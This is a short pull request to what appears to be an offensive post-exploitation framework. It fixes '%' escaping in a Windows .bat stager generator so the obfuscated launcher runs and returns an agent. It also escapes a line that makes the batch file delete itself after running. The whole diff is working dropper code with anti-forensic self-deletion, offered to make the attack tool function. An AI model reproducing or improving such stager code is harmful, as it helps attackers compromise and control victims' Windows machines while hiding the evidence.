### PR TITLE
Add escapes for % characters needed for .bat files

### DIFF
--- a/lib/stagers/windows/launcher_bat.py
+++ b/lib/stagers/windows/launcher_bat.py
@@ -100,8 +100,8 @@ class Stager:
         if obfuscate.lower() == "true":
             obfuscateScript = True
 
-        # generate the launcher code
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
+        # generate the launcher code including escapes for % characters needed for .bat files
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries).replace("%", "%%")
 
         if launcher == "":
             print helpers.color("[!] Error in launcher command generation.")
@@ -112,6 +112,6 @@ class Stager:
 
             if delete.lower() == "true":
                 # code that causes the .bat to delete itself
-                code += "start /b \"\" cmd /c del \"%~f0\"&exit /b\n"
+                code += "start /b \"\" cmd /c del \"%%~f0\"&exit /b\n"
 
             return code


### PR DESCRIPTION
Fixes the issue of stager/launcher_bat not returning agent because of missing escapes for % characters needed for .bat files. Should work now whether Obfuscate is set to true or not.